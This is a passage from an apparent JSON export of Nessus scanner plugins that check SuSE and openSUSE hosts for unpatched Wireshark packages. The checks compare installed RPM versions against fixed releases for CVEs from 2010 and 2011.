value:\"https://lists.opensuse.org/opensuse-updates/2011-06/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"wireshark-1.4.4-0.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"wireshark-devel-1.4.4-0.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-10T16:15:23", "description": "This update to wireshark version 1.4.5 fixes the following security issues :\n\n - Resource Management Errors. (CWE-399, CVE-2011-1590)\n\n - Buffer Errors. (CWE-119, CVE-2011-1591)\n\n - Numeric Errors (CWE-189, CVE-2011-1592)", "cvss3": {"score": null, "vector": null}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : wireshark (ZYPP Patch Number 7500)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_WIRESHARK-7500.NASL", "href": "https://www.tenable.com/plugins/nessus/57262", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57262);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n\n script_name(english:\"SuSE 10 Security Update : wireshark (ZYPP Patch Number 7500)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to wireshark version 1.4.5 fixes the following security\nissues :\n\n - Resource Management Errors. (CWE-399, CVE-2011-1590)\n\n - Buffer Errors. (CWE-119, CVE-2011-1591)\n\n - Numeric Errors (CWE-189, CVE-2011-1592)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1590.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1591.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1592.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7500.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"wireshark-1.4.4-0.39.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"wireshark-1.4.4-0.39.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"wireshark-devel-1.4.4-0.39.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T14:39:34", "description": "This wireshark update fixes :\n\n - Use of un-initialized variables (CVE-2011-1590)\n\n - Buffer overflow in DECT dissector (CVE-2011-1591)\n\n - Crash in NFS dissector on Windows (CVE-2011-1592)", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wireshark (openSUSE-SU-2011:0599-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wireshark", "p-cpe:/a:novell:opensuse:wireshark-debuginfo", "p-cpe:/a:novell:opensuse:wireshark-debugsource", "p-cpe:/a:novell:opensuse:wireshark-devel", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_WIRESHARK-110511.NASL", "href": "https://www.tenable.com/plugins/nessus/76044", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update wireshark-4539.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76044);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n\n script_name(english:\"openSUSE Security Update : wireshark (openSUSE-SU-2011:0599-1)\");\n script_summary(english:\"Check for the wireshark-4539 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This wireshark update fixes :\n\n - Use of un-initialized variables (CVE-2011-1590)\n\n - Buffer overflow in DECT dissector (CVE-2011-1591)\n\n - Crash in NFS dissector on Windows (CVE-2011-1592)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=685023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688109\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-06/msg00010.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"wireshark-1.4.4-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"wireshark-debuginfo-1.4.4-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"wireshark-debugsource-1.4.4-0.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"wireshark-devel-1.4.4-0.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel / wireshark-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:01:00", "description": "Wireshark version 1.4.2 fixes several security issues that allowed attackers to crash wireshark or potentially even execute arbitrary code\n\n(CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2285, CVE-2010-2286, CVE-2010-2287, CVE-2010-2992, CVE-2010-2993, CVE-2010-2994, CVE-2010-2995, CVE-2010-3445, CVE-2010-4300, CVE-2010-4301)", "cvss3": {"score": null, "vector": null}, "published": "2011-05-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wireshark (openSUSE-SU-2011:0010-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wireshark", "p-cpe:/a:novell:opensuse:wireshark-devel", "cpe:/o:novell:opensuse:11.2"], "id": "SUSE_11_2_WIRESHARK-101222.NASL", "href": "https://www.tenable.com/plugins/nessus/53808", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update wireshark-3738.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53808);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\");\n\n script_name(english:\"openSUSE Security Update : wireshark (openSUSE-SU-2011:0010-2)\");\n script_summary(english:\"Check for the wireshark-3738 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wireshark version 1.4.2 fixes several security issues that allowed\nattackers to crash wireshark or potentially even execute arbitrary\ncode\n\n(CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2285,\nCVE-2010-2286, CVE-2010-2287, CVE-2010-2992, CVE-2010-2993,\nCVE-2010-2994, CVE-2010-2995, CVE-2010-3445, CVE-2010-4300,\nCVE-2010-4301)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=603251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=613487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=630599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=643078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-01/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"wireshark-1.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"wireshark-devel-1.4.2-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:50:09", "description": "Wireshark version 1.4.2 fixes several security issues that allowed attackers to crash wireshark or potentially even execute arbitrary code\n\n(CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2285, CVE-2010-2286, CVE-2010-2287, CVE-2010-2992, CVE-2010-2993, CVE-2010-2994, CVE-2010-2995, CVE-2010-3445, CVE-2010-4300, CVE-2010-4301)", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wireshark (openSUSE-SU-2011:0010-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wireshark", "p-cpe:/a:novell:opensuse:wireshark-devel", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_WIRESHARK-101222.NASL", "href": "https://www.tenable.com/plugins/nessus/75771", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update wireshark-3738.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75771);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\");\n\n script_name(english:\"openSUSE Security Update : wireshark (openSUSE-SU-2011:0010-2)\");\n script_summary(english:\"Check for the wireshark-3738 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wireshark version 1.4.2 fixes several security issues that allowed\nattackers to crash wireshark or potentially even execute arbitrary\ncode\n\n(CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2285,\nCVE-2010-2286, CVE-2010-2287, CVE-2010-2992, CVE-2010-2993,\nCVE-2010-2994, CVE-2010-2995, CVE-2010-3445, CVE-2010-4300,\nCVE-2010-4301)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=603251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=613487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=630599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=643078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=655448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-01/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"wireshark-1.4.2-1.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"wireshark-devel-1.4.2-1.1.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:00:57", "description": "Wireshark version 1.4.2 fixes several security issues that allowed attackers to crash wireshark or potentially even execute arbitrary code\n\n(CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2285, CVE-2010-2286, CVE-2010-2287, CVE-2010-2992, CVE-2010-2993, CVE-2010-2994, CVE-2010-2995, CVE-2010-3445, CVE-2010-4300, CVE-2010-4301)", "cvss3": {"score": null, "vector": null}, "published": "2011-05-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : wireshark (openSUSE-SU-2011:0010-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:wireshark", "p-cpe:/a:novell:opensuse:wireshark-devel", "cpe:/o:novell:opensuse:11.1"], "id": "SUSE_11_1_WIRESHARK-101222.NASL", "href": "https://www.tenable.com/plugins/nessus/53689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update wireshark-3731.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53689);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\");\n\n script_name(english:\"openSUSE Security Update : wireshark (openSUSE-SU-2011:0010-1)\");\n script_summary(english:\"Check for the wireshark-3731 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wireshark version 1.4.2 fixes several security issues that allowed\nattackers to crash wireshark or potentially even execute 